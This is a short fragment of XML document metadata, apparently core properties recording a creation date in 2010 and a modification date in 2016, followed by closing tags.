  <dcterms:created xsi:type="dcterms:W3CDTF">2010-04-12T23:12:02Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-02-28T07:07:08Z</dcterms:modified>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ies>
</file>